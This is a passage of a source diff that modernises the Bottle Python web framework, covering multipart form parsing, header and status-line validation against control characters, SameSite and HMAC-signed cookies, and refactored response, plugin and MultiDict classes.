encoding was. """ + return 'chunked' in self.environ.get( + 'HTTP_TRANSFER_ENCODING', '').lower() + #: An alias for :attr:`query`. GET = query @@ -1055,37 +1390,36 @@ def body(self): def POST(self): """ The values of :attr:`forms` and :attr:`files` combined into a single :class:`FormsDict`. Values are either strings (form values) or - instances of :class:`cgi.FieldStorage` (file uploads). + instances of :class:`FileUpload`. 
""" post = FormsDict() + content_type = self.environ.get('CONTENT_TYPE', '') + content_type, options = _parse_http_header(content_type)[0] # We default to application/x-www-form-urlencoded for everything that # is not multipart and take the fast path (also: 3.1 workaround) - if not self.content_type.startswith('multipart/'): - maxlen = max(0, min(self.content_length, self.MEMFILE_MAX)) - pairs = _parse_qsl(tonat(self.body.read(maxlen), 'latin1')) - for key, value in pairs[:self.MAX_PARAMS]: + if not content_type.startswith('multipart/'): + body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1') + for key, value in _parse_qsl(body): post[key] = value return post - safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi - for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'): - if key in self.environ: safe_env[key] = self.environ[key] - args = dict(fp=self.body, environ=safe_env, keep_blank_values=True) - if py31: - args['fp'] = NCTextIOWrapper(args['fp'], encoding='ISO-8859-1', - newline='\n') - elif py3k: - args['encoding'] = 'ISO-8859-1' - data = FieldStorage(**args) - for item in (data.list or [])[:self.MAX_PARAMS]: - post[item.name] = item if item.filename else item.value - return post + post.recode_unicode = False + charset = options.get("charset", "utf8") + boundary = options.get("boundary") + if not boundary: + raise MultipartError("Invalid content type header, missing boundary") + parser = _MultipartParser(self.body, boundary, self.content_length, + mem_limit=self.MEMFILE_MAX, memfile_limit=self.MEMFILE_MAX, + charset=charset) + + for part in parser.parse(): + if not part.filename and part.is_buffered(): + post[part.name] = tonat(part.value, 'utf8') + else: + post[part.name] = FileUpload(part.file, part.name, + part.filename, part.headerlist) - @property - def COOKIES(self): - ''' Alias for :attr:`cookies` (deprecated). ''' - depr('BaseRequest.COOKIES was renamed to BaseRequest.cookies (lowercase).') - return self.cookies + return post @property def url(self): @@ -1097,12 +1431,13 @@ def url(self): @DictProperty('environ', 'bottle.request.urlparts', read_only=True) def urlparts(self): - ''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. + """ The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. The tuple contains (scheme, host, path, query_string and fragment), but the fragment is always empty because it is not visible to the - server. ''' + server. """ env = self.environ - http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http') + http = env.get('HTTP_X_FORWARDED_PROTO') \ + or env.get('wsgi.url_scheme', 'http') host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST') if not host: # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients. @@ -1126,46 +1461,46 @@ def query_string(self): @property def script_name(self): - ''' The initial portion of the URL's `path` that was removed by a higher + """ The initial portion of the URL's `path` that was removed by a higher level (server or routing middleware) before the application was called. This script path is returned with leading and tailing - slashes. ''' + slashes. """ script_name = self.environ.get('SCRIPT_NAME', '').strip('/') return '/' + script_name + '/' if script_name else '/' def path_shift(self, shift=1): - ''' Shift path segments from :attr:`path` to :attr:`script_name` and + """ Shift path segments from :attr:`path` to :attr:`script_name` and vice versa. :param shift: The number of path segments to shift. 
May be negative to change the shift direction. (default: 1) - ''' - script = self.environ.get('SCRIPT_NAME','/') - self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift) + """ + script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift) + self['SCRIPT_NAME'], self['PATH_INFO'] = script, path @property def content_length(self): - ''' The request body length as an integer. The client is responsible to + """ The request body length as an integer. The client is responsible to set this header. Otherwise, the real length of the body is unknown - and -1 is returned. In this case, :attr:`body` will be empty. ''' + and -1 is returned. In this case, :attr:`body` will be empty. """ return int(self.environ.get('CONTENT_LENGTH') or -1) @property def content_type(self): - ''' The Content-Type header as a lowercase-string (default: empty). ''' + """ The Content-Type header as a lowercase-string (default: empty). """ return self.environ.get('CONTENT_TYPE', '').lower() @property def is_xhr(self): - ''' True if the request was triggered by a XMLHttpRequest. This only + """ True if the request was triggered by a XMLHttpRequest. This only works with JavaScript libraries that support the `X-Requested-With` - header (most of the popular libraries do). ''' - requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','') + header (most of the popular libraries do). """ + requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '') return requested_with.lower() == 'xmlhttprequest' @property def is_ajax(self): - ''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. ''' + """ Alias for :attr:`is_xhr`. "Ajax" is not the right term. """ return self.is_xhr @property @@ -1176,7 +1511,7 @@ def auth(self): front web-server or a middleware), the password field is None, but the user field is looked up from the ``REMOTE_USER`` environ variable. On any errors, None is returned. """ - basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION','')) + basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', '')) if basic: return basic ruser = self.environ.get('REMOTE_USER') if ruser: return (ruser, None) @@ -1204,12 +1539,25 @@ def copy(self): """ Return a new :class:`Request` with a shallow :attr:`environ` copy. """ return Request(self.environ.copy()) - def get(self, value, default=None): return self.environ.get(value, default) - def __getitem__(self, key): return self.environ[key] - def __delitem__(self, key): self[key] = ""; del(self.environ[key]) - def __iter__(self): return iter(self.environ) - def __len__(self): return len(self.environ) - def keys(self): return self.environ.keys() + def get(self, value, default=None): + return self.environ.get(value, default) + + def __getitem__(self, key): + return self.environ[key] + + def __delitem__(self, key): + self[key] = "" + del (self.environ[key]) + + def __iter__(self): + return iter(self.environ) + + def __len__(self): + return len(self.environ) + + def keys(self): + return self.environ.keys() + def __setitem__(self, key, value): """ Change an environ value and clear all caches that depend on it. """ @@ -1227,46 +1575,63 @@ def __setitem__(self, key, value): todelete = ('headers', 'cookies') for key in todelete: - self.environ.pop('bottle.request.'+key, None) + self.environ.pop('bottle.request.' + key, None) def __repr__(self): return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url) def __getattr__(self, name): - ''' Search in self.environ for additional user defined attributes. 
''' + """ Search in self.environ for additional user defined attributes. """ try: - var = self.environ['bottle.request.ext.%s'%name] + var = self.environ['bottle.request.ext.%s' % name] return var.__get__(self) if hasattr(var, '__get__') else var except KeyError: raise AttributeError('Attribute %r not defined.' % name) def __setattr__(self, name, value): + """ Define new attributes that are local to the bound request environment. """ if name == 'environ': return object.__setattr__(self, name, value) - self.environ['bottle.request.ext.%s'%name] = value + key = 'bottle.request.ext.%s' % name + if hasattr(self, name): + raise AttributeError("Attribute already defined: %s" % name) + self.environ[key] = value + + def __delattr__(self, name): + try: + del self.environ['bottle.request.ext.%s' % name] + except KeyError: + raise AttributeError("Attribute not defined: %s" % name) +def _hkey(key): + if '\n' in key or '\r' in key or '\0' in key: + raise ValueError("Header names must not contain control characters: %r" % key) + return key.title().replace('_', '-') -def _hkey(s): - return s.title().replace('_','-') +def _hval(value): + value = tonat(value) + if '\n' in value or '\r' in value or '\0' in value: + raise ValueError("Header value must not contain control characters: %r" % value) + return value class HeaderProperty(object): - def __init__(self, name, reader=None, writer=str, default=''): + def __init__(self, name, reader=None, writer=None, default=''): self.name, self.default = name, default self.reader, self.writer = reader, writer self.__doc__ = 'Current value of the %r header.' % name.title() - def __get__(self, obj, cls): + def __get__(self, obj, _): if obj is None: return self - value = obj.headers.get(self.name, self.default) + value = obj.get_header(self.name, self.default) return self.reader(value) if self.reader else value def __set__(self, obj, value): - obj.headers[self.name] = self.writer(value) + obj[self.name] = self.writer(value) if self.writer else value def __delete__(self, obj): - del obj.headers[self.name] + del obj[self.name] class BaseResponse(object): @@ -1280,28 +1645,51 @@ class BaseResponse(object): default_status = 200 default_content_type = 'text/html; charset=UTF-8' - # Header blacklist for specific response codes + # Header denylist for specific response codes # (rfc2616 section 10.2.3 and 10.3.5) bad_headers = { - 204: set(('Content-Type',)), - 304: set(('Allow', 'Content-Encoding', 'Content-Language', + 204: frozenset(('Content-Type', 'Content-Length')), + 304: frozenset(('Allow', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Range', 'Content-Type', - 'Content-Md5', 'Last-Modified'))} + 'Content-Md5', 'Last-Modified')) + } + + def __init__(self, body='', status=None, headers=None, **more_headers): + """ Create a new response object. - def __init__(self, body='', status=None, **headers): + :param body: The response body as one of the supported types. + :param status: Either an HTTP status code (e.g. 200) or a status line + including the reason phrase (e.g. '200 OK'). + :param headers: A dictionary or a list of name-value pairs. + + Additional keyword arguments are added to the list of headers. + Underscores in the header name are replaced with dashes. + """ self._cookies = None - self._headers = {'Content-Type': [self.default_content_type]} + self._headers = {} self.body = body self.status = status or self.default_status if headers: - for name, value in headers.items(): - self[name] = value - - def copy(self): - ''' Returns a copy of self. 
''' - copy = Response() + if isinstance(headers, dict): + headers = headers.items() + for name, value in headers: + self.add_header(name, value) + if more_headers: + for name, value in more_headers.items(): + self.add_header(name, value) + + def copy(self, cls=None): + """ Returns a copy of self. """ + cls = cls or BaseResponse + assert issubclass(cls, BaseResponse) + copy = cls() copy.status = self.status copy._headers = dict((k, v[:]) for (k, v) in self._headers.items()) + if self._cookies: + cookies = copy._cookies = SimpleCookie() + for k,v in self._cookies.items(): + cookies[k] = v.value + cookies[k].update(v) # also copy cookie attributes return copy def __iter__(self): @@ -1313,30 +1701,34 @@ def close(self): @property def status_line(self): - ''' The HTTP status line as a string (e.g. ``404 Not Found``).''' + """ The HTTP status line as a string (e.g. ``404 Not Found``).""" return self._status_line @property def status_code(self): - ''' The HTTP status code as an integer (e.g. 404).''' + """ The HTTP status code as an integer (e.g. 404).""" return self._status_code def _set_status(self, status): if isinstance(status, int): code, status = status, _HTTP_STATUS_LINES.get(status) elif ' ' in status: + if '\n' in status or '\r' in status or '\0' in status: + raise ValueError('Status line must not include control chars.') status = status.strip() - code = int(status.split()[0]) + code = int(status.split()[0]) else: raise ValueError('String status line without a reason phrase.') - if not 100 <= code <= 999: raise ValueError('Status code out of range.') + if not 100 <= code <= 999: + raise ValueError('Status code out of range.') self._status_code = code self._status_line = str(status or ('%d Unknown' % code)) def _get_status(self): return self._status_line - status = property(_get_status, _set_status, None, + status = property( + _get_status, _set_status, None, ''' A writeable property to change the HTTP response status. It accepts either a numeric code (100-999) or a string with a custom reason phrase (e.g. "404 Brain not found"). Both :data:`status_line` and @@ -1346,75 +1738,83 @@ def _get_status(self): @property def headers(self): - ''' An instance of :class:`HeaderDict`, a case-insensitive dict-like - view on the response headers. ''' + """ An instance of :class:`HeaderDict`, a case-insensitive dict-like + view on the response headers. """ hdict = HeaderDict() hdict.dict = self._headers return hdict - def __contains__(self, name): return _hkey(name) in self._headers - def __delitem__(self, name): del self._headers[_hkey(name)] - def __getitem__(self, name): return self._headers[_hkey(name)][-1] - def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)] + def __contains__(self, name): + return _hkey(name) in self._headers + + def __delitem__(self, name): + del self._headers[_hkey(name)] + + def __getitem__(self, name): + return self._headers[_hkey(name)][-1] + + def __setitem__(self, name, value): + self._headers[_hkey(name)] = [_hval(value)] def get_header(self, name, default=None): - ''' Return the value of a previously defined header. If there is no - header with that name, return a default value. ''' + """ Return the value of a previously defined header. If there is no + header with that name, return a default value. """ return self._headers.get(_hkey(name), [default])[-1] def set_header(self, name, value): - ''' Create a new response header, replacing any previously defined - headers with the same name. 
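# Editor's note (illustrative sketch, not part of the patch): the new response
# constructor signature documented above. 'headers' may be a dict or a list of
# pairs, and extra keyword arguments become headers with underscores replaced
# by dashes. The header names and values below are made up.
from bottle import HTTPResponse

rs = HTTPResponse(body='created', status=201,
                  headers={'Cache-Control': 'no-store'},
                  Content_Type='text/plain; charset=UTF-8')  # sent as 'Content-Type'
rs.set_header('X-Request-Id', 'abc123')   # replaces any previously set value
rs.add_header('Vary', 'Accept')           # appends without removing duplicates
print(rs.headerlist)                      # WSGI-ready list of (name, value) pairs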
''' - self._headers[_hkey(name)] = [str(value)] + """ Create a new response header, replacing any previously defined + headers with the same name. """ + self._headers[_hkey(name)] = [_hval(value)] def add_header(self, name, value): - ''' Add an additional response header, not removing duplicates. ''' - self._headers.setdefault(_hkey(name), []).append(str(value)) + """ Add an additional response header, not removing duplicates. """ + self._headers.setdefault(_hkey(name), []).append(_hval(value)) def iter_headers(self): - ''' Yield (header, value) tuples, skipping headers that are not - allowed with the current response status code. ''' + """ Yield (header, value) tuples, skipping headers that are not + allowed with the current response status code. """ return self.headerlist - def wsgiheader(self): - depr('The wsgiheader method is deprecated. See headerlist.') #0.10 - return self.headerlist + def _wsgi_status_line(self): + """ WSGI conform status line (latin1-encodeable) """ + if py3k: + return self._status_line.encode('utf8').decode('latin1') + return self._status_line @property def headerlist(self): - ''' WSGI conform list of (header, value) tuples. ''' + """ WSGI conform list of (header, value) tuples. """ out = [] - headers = self._headers.items() + headers = list(self._headers.items()) + if 'Content-Type' not in self._headers: + headers.append(('Content-Type', [self.default_content_type])) if self._status_code in self.bad_headers: bad_headers = self.bad_headers[self._status_code] headers = [h for h in headers if h[0] not in bad_headers] - out += [(name, val) for name, vals in headers for val in vals] + out += [(name, val) for (name, vals) in headers for val in vals] if self._cookies: for c in self._cookies.values(): - out.append(('Set-Cookie', c.OutputString())) + out.append(('Set-Cookie', _hval(c.OutputString()))) + if py3k: + out = [(k, v.encode('utf8').decode('latin1')) for (k, v) in out] return out content_type = HeaderProperty('Content-Type') - content_length = HeaderProperty('Content-Length', reader=int) + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + expires = HeaderProperty( + 'Expires', + reader=lambda x: datetime.fromtimestamp(parse_date(x), UTC), + writer=lambda x: http_date(x)) @property - def charset(self): + def charset(self, default='UTF-8'): """ Return the charset specified in the content-type header (default: utf8). """ if 'charset=' in self.content_type: return self.content_type.split('charset=')[-1].split(';')[0].strip() - return 'UTF-8' - - @property - def COOKIES(self): - """ A dict-like SimpleCookie instance. This should not be used directly. - See :meth:`set_cookie`. """ - depr('The COOKIES dict is deprecated. Use `set_cookie()` instead.') # 0.10 - if not self._cookies: - self._cookies = SimpleCookie() - return self._cookies + return default - def set_cookie(self, name, value, secret=None, **options): - ''' Create a new cookie or replace an old one. If the `secret` parameter is + def set_cookie(self, name, value, secret=None, digestmod=hashlib.sha256, **options): + """ Create a new cookie or replace an old one. If the `secret` parameter is set, create a `Signed Cookie` (described below). :param name: the name of the cookie. @@ -1424,7 +1824,7 @@ def set_cookie(self, name, value, secret=None, **options): Additionally, this method accepts all RFC 2109 attributes that are supported by :class:`cookie.Morsel`, including: - :param max_age: maximum age in seconds. (default: None) + :param maxage: maximum age in seconds. 
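As the docstrings above spell out, `set_header()` replaces while `add_header()` appends, and `headerlist` now injects the default Content-Type only when the response did not set one itself. A short sketch under those assumptions, with invented header names:

```python
from bottle import BaseResponse

resp = BaseResponse()
resp.set_header('Cache-Control', 'no-cache')
resp.set_header('Cache-Control', 'no-store')    # replaces the earlier value
resp.add_header('X-Sqlmap-Note', 'first')
resp.add_header('X-Sqlmap-Note', 'second')      # keeps both values

for name, value in resp.headerlist:             # default Content-Type added lazily
    print('%s: %s' % (name, value))
```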
(default: None) :param expires: a datetime object or UNIX timestamp. (default: None) :param domain: the domain that is allowed to read the cookie. (default: current domain) @@ -1432,8 +1832,10 @@ def set_cookie(self, name, value, secret=None, **options): :param secure: limit the cookie to HTTPS connections (default: off). :param httponly: prevents client-side javascript to read this cookie (default: off, requires Python 2.6 or newer). + :param samesite: Control or disable third-party use for this cookie. + Possible values: `lax`, `strict` or `none` (default). - If neither `expires` nor `max_age` is set (default), the cookie will + If neither `expires` nor `maxage` is set (default), the cookie will expire at the end of the browser session (as soon as the browser window is closed). @@ -1441,37 +1843,60 @@ def set_cookie(self, name, value, secret=None, **options): cryptographically signed to prevent manipulation. Keep in mind that cookies are limited to 4kb in most browsers. + Warning: Pickle is a potentially dangerous format. If an attacker + gains access to the secret key, he could forge cookies that execute + code on server side if unpickled. Using pickle is discouraged and + support for it will be removed in later versions of bottle. + Warning: Signed cookies are not encrypted (the client can still see the content) and not copy-protected (the client can restore an old cookie). The main intention is to make pickling and unpickling save, not to store secret information at client side. - ''' + """ if not self._cookies: self._cookies = SimpleCookie() + # Monkey-patch Cookie lib to support 'SameSite' parameter + # https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.1 + if py < (3, 8, 0): + Morsel._reserved.setdefault('samesite', 'SameSite') + if secret: - value = touni(cookie_encode((name, value), secret)) + if not isinstance(value, basestring): + depr(0, 13, "Pickling of arbitrary objects into cookies is " + "deprecated.", "Only store strings in cookies. " + "JSON strings are fine, too.") + encoded = base64.b64encode(pickle.dumps([name, value], -1)) + sig = base64.b64encode(hmac.new(tob(secret), encoded, + digestmod=digestmod).digest()) + value = touni(tob('!') + sig + tob('?') + encoded) elif not isinstance(value, basestring): - raise TypeError('Secret key missing for non-string Cookie.') + raise TypeError('Secret key required for non-string cookies.') + + # Cookie size plus options must not exceed 4kb. 
+ if len(name) + len(value) > 3800: + raise ValueError('Content does not fit into a cookie.') - if len(value) > 4096: raise ValueError('Cookie value to long.') self._cookies[name] = value for key, value in options.items(): - if key == 'max_age': + if key in ('max_age', 'maxage'): # 'maxage' variant added in 0.13 + key = 'max-age' if isinstance(value, timedelta): value = value.seconds + value.days * 24 * 3600 if key == 'expires': - if isinstance(value, (datedate, datetime)): - value = value.timetuple() - elif isinstance(value, (int, float)): - value = time.gmtime(value) - value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) - self._cookies[name][key.replace('_', '-')] = value + value = http_date(value) + if key in ('same_site', 'samesite'): # 'samesite' variant added in 0.13 + key, value = 'samesite', (value or "none").lower() + if value not in ('lax', 'strict', 'none'): + raise CookieError("Invalid value for SameSite") + if key in ('secure', 'httponly') and not value: + continue + self._cookies[name][key] = value def delete_cookie(self, key, **kwargs): - ''' Delete a cookie. Be sure to use the same `domain` and `path` - settings as used to create the cookie. ''' + """ Delete a cookie. Be sure to use the same `domain` and `path` + settings as used to create the cookie. """ kwargs['max_age'] = -1 kwargs['expires'] = 0 self.set_cookie(key, '', **kwargs) @@ -1482,169 +1907,155 @@ def __repr__(self): out += '%s: %s\n' % (name.title(), value.strip()) return out -#: Thread-local storage for :class:`LocalRequest` and :class:`LocalResponse` -#: attributes. -_lctx = threading.local() -def local_property(name): - def fget(self): +def _local_property(): + ls = threading.local() + + def fget(_): try: - return getattr(_lctx, name) + return ls.var except AttributeError: raise RuntimeError("Request context not initialized.") - def fset(self, value): setattr(_lctx, name, value) - def fdel(self): delattr(_lctx, name) - return property(fget, fset, fdel, - 'Thread-local property stored in :data:`_lctx.%s`' % name) + + def fset(_, value): + ls.var = value + + def fdel(_): + del ls.var + + return property(fget, fset, fdel, 'Thread-local property') class LocalRequest(BaseRequest): - ''' A thread-local subclass of :class:`BaseRequest` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseRequest` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`request`). If accessed during a request/response cycle, this instance always refers to the *current* - request (even on a multithreaded server). ''' + request (even on a multithreaded server). """ bind = BaseRequest.__init__ - environ = local_property('request_environ') + environ = _local_property() class LocalResponse(BaseResponse): - ''' A thread-local subclass of :class:`BaseResponse` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseResponse` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`response`). Its attributes are used to build the HTTP response at the end of the request/response cycle. 
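A usage sketch for the reworked `set_cookie()`/`delete_cookie()` shown above. The cookie names, values and the secret are placeholders; the snippet assumes the patched `bottle` module is importable.

```python
from datetime import timedelta
from bottle import BaseResponse

resp = BaseResponse()

# Plain cookie using the new SameSite support and a timedelta max_age.
resp.set_cookie('sessionid', 'abc123', max_age=timedelta(hours=1),
                httponly=True, samesite='lax')

# Signed cookie: HMAC (SHA-256 by default) protects against tampering,
# but the value is still readable by the client.
resp.set_cookie('account', 'anonymous', secret='change-me')

# delete_cookie() reuses set_cookie() with max_age=-1 and expires=0.
resp.delete_cookie('sessionid')

for name, value in resp.headerlist:
    if name == 'Set-Cookie':
        print(value)
```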
- ''' + """ bind = BaseResponse.__init__ - _status_line = local_property('response_status_line') - _status_code = local_property('response_status_code') - _cookies = local_property('response_cookies') - _headers = local_property('response_headers') - body = local_property('response_body') + _status_line = _local_property() + _status_code = _local_property() + _cookies = _local_property() + _headers = _local_property() + body = _local_property() + Request = BaseRequest Response = BaseResponse + class HTTPResponse(Response, BottleException): - def __init__(self, body='', status=None, header=None, **headers): - if header or 'output' in headers: - depr('Call signature changed (for the better)') - if header: headers.update(header) - if 'output' in headers: body = headers.pop('output') - super(HTTPResponse, self).__init__(body, status, **headers) - - def apply(self, response): - response._status_code = self._status_code - response._status_line = self._status_line - response._headers = self._headers - response._cookies = self._cookies - response.body = self.body - - def _output(self, value=None): - depr('Use HTTPResponse.body instead of HTTPResponse.output') - if value is None: return self.body - self.body = value - - output = property(_output, _output, doc='Alias for .body') + """ A subclass of :class:`Response` that can be raised or returned from request + handlers to short-curcuit request processing and override changes made to the + global :data:`request` object. This bypasses error handlers, even if the status + code indicates an error. Return or raise :class:`HTTPError` to trigger error + handlers. + """ -class HTTPError(HTTPResponse): - default_status = 500 - def __init__(self, status=None, body=None, exception=None, traceback=None, header=None, **headers): - self.exception = exception - self.traceback = traceback - super(HTTPError, self).__init__(body, status, header, **headers) + def __init__(self, body='', status=None, headers=None, **more_headers): + super(HTTPResponse, self).__init__(body, status, headers, **more_headers) + + def apply(self, other): + """ Copy the state of this response to a different :class:`Response` object. """ + other._status_code = self._status_code + other._status_line = self._status_line + other._headers = self._headers + other._cookies = self._cookies + other.body = self.body +class HTTPError(HTTPResponse): + """ A subclass of :class:`HTTPResponse` that triggers error handlers. 
""" + default_status = 500 + def __init__(self, + status=None, + body=None, + exception=None, + traceback=None, **more_headers): + self.exception = exception + self.traceback = traceback + super(HTTPError, self).__init__(body, status, **more_headers) ############################################################################### # Plugins ###################################################################### ############################################################################### -class PluginError(BottleException): pass + +class PluginError(BottleException): + pass + class JSONPlugin(object): name = 'json' - api = 2 + api = 2 def __init__(self, json_dumps=json_dumps): self.json_dumps = json_dumps + def setup(self, app): + app.config._define('json.enable', default=True, validate=bool, + help="Enable or disable automatic dict->json filter.") + app.config._define('json.ascii', default=False, validate=bool, + help="Use only 7-bit ASCII characters in output.") + app.config._define('json.indent', default=True, validate=bool, + help="Add whitespace to make json more readable.") + app.config._define('json.dump_func', default=None, + help="If defined, use this function to transform" + " dict into json. The other options no longer" + " apply.") + def apply(self, callback, route): dumps = self.json_dumps - if not dumps: return callback + if not self.json_dumps: return callback + + @functools.wraps(callback) def wrapper(*a, **ka): - rv = callback(*a, **ka) + try: + rv = callback(*a, **ka) + except HTTPResponse as resp: + rv = resp + if isinstance(rv, dict): #Attempt to serialize, raises exception on failure json_response = dumps(rv) - #Set content type only if serialization succesful + #Set content type only if serialization successful response.content_type = 'application/json' return json_response + elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict): + rv.body = dumps(rv.body) + rv.content_type = 'application/json' return rv - return wrapper - - -class HooksPlugin(object): - name = 'hooks' - api = 2 - - _names = 'before_request', 'after_request', 'app_reset' - - def __init__(self): - self.hooks = dict((name, []) for name in self._names) - self.app = None - def _empty(self): - return not (self.hooks['before_request'] or self.hooks['after_request']) - - def setup(self, app): - self.app = app - - def add(self, name, func): - ''' Attach a callback to a hook. ''' - was_empty = self._empty() - self.hooks.setdefault(name, []).append(func) - if self.app and was_empty and not self._empty(): self.app.reset() - - def remove(self, name, func): - ''' Remove a callback from a hook. ''' - was_empty = self._empty() - if name in self.hooks and func in self.hooks[name]: - self.hooks[name].remove(func) - if self.app and not was_empty and self._empty(): self.app.reset() - - def trigger(self, name, *a, **ka): - ''' Trigger a hook and return a list of results. ''' - hooks = self.hooks[name] - if ka.pop('reversed', False): hooks = hooks[::-1] - return [hook(*a, **ka) for hook in hooks] - - def apply(self, callback, route): - if self._empty(): return callback - def wrapper(*a, **ka): - self.trigger('before_request') - rv = callback(*a, **ka) - self.trigger('after_request', reversed=True) - return rv return wrapper class TemplatePlugin(object): - ''' This plugin applies the :func:`view` decorator to all routes with a + """ This plugin applies the :func:`view` decorator to all routes with a `template` config parameter. 
If the parameter is a tuple, the second element must be a dict with additional options (e.g. `template_engine`) - or default variables for the template. ''' + or default variables for the template. """ name = 'template' - api = 2 + api = 2 + + def setup(self, app): + app.tpl = self def apply(self, callback, route): conf = route.config.get('template') if isinstance(conf, (tuple, list)) and len(conf) == 2: return view(conf[0], **conf[1])(callback) - elif isinstance(conf, str) and 'template_opts' in route.config: - depr('The `template_opts` parameter is deprecated.') #0.9 - return view(conf, **route.config['template_opts'])(callback) elif isinstance(conf, str): return view(conf)(callback) else: @@ -1654,23 +2065,38 @@ def apply(self, callback, route): #: Not a plugin, but part of the plugin API. TODO: Find a better place. class _ImportRedirect(object): def __init__(self, name, impmask): - ''' Create a virtual package that redirects imports (see PEP 302). ''' + """ Create a virtual package that redirects imports (see PEP 302). """ self.name = name self.impmask = impmask - self.module = sys.modules.setdefault(name, imp.new_module(name)) - self.module.__dict__.update({'__file__': __file__, '__path__': [], - '__all__': [], '__loader__': self}) + self.module = sys.modules.setdefault(name, new_module(name)) + self.module.__dict__.update({ + '__file__': __file__, + '__path__': [], + '__all__': [], + '__loader__': self + }) sys.meta_path.append(self) + def find_spec(self, fullname, path, target=None): + if '.' not in fullname: return + if fullname.rsplit('.', 1)[0] != self.name: return + from importlib.util import spec_from_loader + return spec_from_loader(fullname, self) + def find_module(self, fullname, path=None): if '.' not in fullname: return - packname, modname = fullname.rsplit('.', 1) - if packname != self.name: return + if fullname.rsplit('.', 1)[0] != self.name: return return self + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass # This probably breaks importlib.reload() :/ + def load_module(self, fullname): if fullname in sys.modules: return sys.modules[fullname] - packname, modname = fullname.rsplit('.', 1) + modname = fullname.rsplit('.', 1)[1] realname = self.impmask % modname __import__(realname) module = sys.modules[fullname] = sys.modules[realname] @@ -1678,11 +2104,6 @@ def load_module(self, fullname): module.__loader__ = self return module - - - - - ############################################################################### # Common Utilities ############################################################# ############################################################################### @@ -1697,38 +2118,68 @@ class MultiDict(DictMixin): def __init__(self, *a, **k): self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items()) - def __len__(self): return len(self.dict) - def __iter__(self): return iter(self.dict) - def __contains__(self, key): return key in self.dict - def __delitem__(self, key): del self.dict[key] - def __getitem__(self, key): return self.dict[key][-1] - def __setitem__(self, key, value): self.append(key, value) - def keys(self): return self.dict.keys() + def __len__(self): + return len(self.dict) + + def __iter__(self): + return iter(self.dict) + + def __contains__(self, key): + return key in self.dict + + def __delitem__(self, key): + del self.dict[key] + + def __getitem__(self, key): + return self.dict[key][-1] + + def __setitem__(self, key, value): + self.append(key, value) + + def keys(self): + 
return self.dict.keys() if py3k: - def values(self): return (v[-1] for v in self.dict.values()) - def items(self): return ((k, v[-1]) for k, v in self.dict.items()) + + def values(self): + return (v[-1] for v in self.dict.values()) + + def items(self): + return ((k, v[-1]) for k, v in self.dict.items()) + def allitems(self): return ((k, v) for k, vl in self.dict.items() for v in vl) + iterkeys = keys itervalues = values iteritems = items iterallitems = allitems else: - def values(self): return [v[-1] for v in self.dict.values()] - def items(self): return [(k, v[-1]) for k, v in self.dict.items()] - def iterkeys(self): return self.dict.iterkeys() - def itervalues(self): return (v[-1] for v in self.dict.itervalues()) + + def values(self): + return [v[-1] for v in self.dict.values()] + + def items(self): + return [(k, v[-1]) for k, v in self.dict.items()] + + def iterkeys(self): + return self.dict.iterkeys() + + def itervalues(self): + return (v[-1] for v in self.dict.itervalues()) + def iteritems(self): return ((k, v[-1]) for k, v in self.dict.iteritems()) + def iterallitems(self): return ((k, v) for k, vl in self.dict.iteritems() for v in vl) + def allitems(self): return [(k, v) for k, vl in self.dict.iteritems() for v in vl] def get(self, key, default=None, index=-1, type=None): - ''' Return the most recent value for a key. + """ Return the most recent value for a key. :param default: The default value to be returned if the key is not present or the type conversion fails. @@ -1736,7 +2187,7 @@ def get(self, key, default=None, index=-1, type=None): :param type: If defined, this callable is used to cast the value into a specific type. Exception are suppressed and result in the default value to be returned. - ''' + """ try: val = self.dict[key][index] return type(val) if type else val @@ -1745,15 +2196,15 @@ def get(self, key, default=None, index=-1, type=None): return default def append(self, key, value): - ''' Add a new value to the list of values for this key. ''' + """ Add a new value to the list of values for this key. """ self.dict.setdefault(key, []).append(value) def replace(self, key, value): - ''' Replace the list of values with a single value. ''' + """ Replace the list of values with a single value. """ self.dict[key] = [value] def getall(self, key): - ''' Return a (possibly empty) list of values for a key. ''' + """ Return a (possibly empty) list of values for a key. """ return self.dict.get(key) or [] #: Aliases for WTForms to mimic other multi-dict APIs (Django) @@ -1761,14 +2212,13 @@ def getall(self, key): getlist = getall - class FormsDict(MultiDict): - ''' This :class:`MultiDict` subclass is used to store request form data. + """ This :class:`MultiDict` subclass is used to store request form data. Additionally to the normal dict-like item access methods (which return unmodified data as native strings), this container also supports attribute-like access to its values. Attributes are automatically de- or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing - attributes default to an empty string. ''' + attributes default to an empty string. """ #: Encoding used for attribute values. 
